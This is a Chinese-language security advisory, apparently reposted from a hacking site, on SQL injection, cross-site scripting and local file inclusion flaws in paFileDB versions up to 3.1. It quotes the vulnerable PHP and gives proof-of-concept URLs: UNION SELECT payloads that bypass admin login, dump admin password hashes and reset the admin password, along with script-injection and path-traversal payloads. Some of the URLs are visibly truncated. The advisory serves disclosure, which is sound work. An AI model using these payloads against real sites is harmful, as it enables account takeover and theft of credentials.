原始连接:
http://hackbase.com/hacker/leak/2005061711829.html
发布日期:2005-06-16
更新日期:2005-06-16
受影响系统:
PHP Arena paFileDB 3.1
PHP Arena paFileDB 3.0 Beta 3.1
PHP Arena paFileDB 3.0
PHP Arena paFileDB 2.1.1
PHP Arena paFileDB 1.1.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: _blank>13967
paFileDB是一款文件管理脚本,允许版主管理站点下载文件数据库,还可以编辑和删除文件。
paFileDB中存在多个输入验证漏洞,如下:
paFileDB中存在多个SQL注入漏洞,具体影响取决于数据库实现所支持的功能,但由于受影响查询的本质,影响可能很有限。
if ($login == "do")
{
$admin = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_admin
WHERE admin_username = '$formname'", 1);
$formpw = md5($formpass);
if ($formpw == $admin[admin_password])
{
$adminip = getenv ("REMOTE_ADDR");
$ip = md5($adminip);
$user = $formname;
$pass = $formpw;
if ($authmethod == "cookies")
{
$cookiedata = "$ip|$formname|$formpw";
setcookie("pafiledbcookie", $cookiedata);
}
header("Location: admin.php");
}
变量$formname是直接从提交的登陆表单获得的,并直接在查询中执行,因此攻击者可以使用UNION SELECT绕过管理员认证。
在向pafiledb.php脚本的的sortby、filelist和pages参数传送用户提供参数时存在多个跨站脚本漏洞。利用这些漏洞可能导致入侵软件,劫持会话及其他对基础数据库的攻击。
paFileDB中还存在文件泄漏漏洞。pafiledb.php脚本的action参数受这个漏洞影响。
if ($login == "do") { include "./includes/$action/login.php"; exit; }
if ($ad == "logout") { include "./includes/admin/logout.php"; exit; }
if ($tm == "logout") { include "./includes/team/logout.php"; exit; }
没有过滤$action变量,因此可能导致目录遍历。
<*来源:James Bercegay (
security@gulftech.org)
链接:_blank>
http://marc.theaimsgroup.com/?l= ... 85787217807&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
跨站脚本漏洞:
_blank>
http://pafiledb/pafiledb.php?act ... e%29%3C%2Fscript%3E
_blank>
http://pafiledb/pafiledb.php?act ... e%29%3C%2Fscript%3E
_blank>
http://pafiledb/pafiledb.php?act ... e%29%3C%2Fscript%3E
SQL注入漏洞:
_id,%20admin_username,%20'6f1ed002ab5595859014ebf0951522d9',%20admin_email,%201%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do" target=_blank>
http://pafiledb/pafiledb.php?act ... do&formname=-99'%20UNION%20SELECT%20admin_id,%20admin_username,%20'6f1ed002ab5595859014ebf0951522d9',%20admin_email,%201%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do
_username,admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+Category+%3C%3C&action=team&tm=category&category=edit&edit=form&menu1=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit" target=_blank>
http://pafiledb/pafiledb.php?select=-99'%20UNION%20SELECT%200,admin_username,admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+Category+%3C%3C&action=team&tm=category&category=edit&edit=form&menu1=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit
_username,admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit" target=_blank>
http://pafiledb/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_username,admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit
_admin%20SET%20admin_password%20=%20MD5%281337%28%20WHERE%201/*" target=_blank>
http://pafiledb/pafiledb.php?act ... 337%28%20WHERE%201/*
本地文件包含漏洞:
_blank>
http://pafiledb/pafiledb.php?act ... swd%00&login=do
建议:
--------------------------------------------------------------------------------
厂商补丁:
PHP Arena
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
www.phparena.net
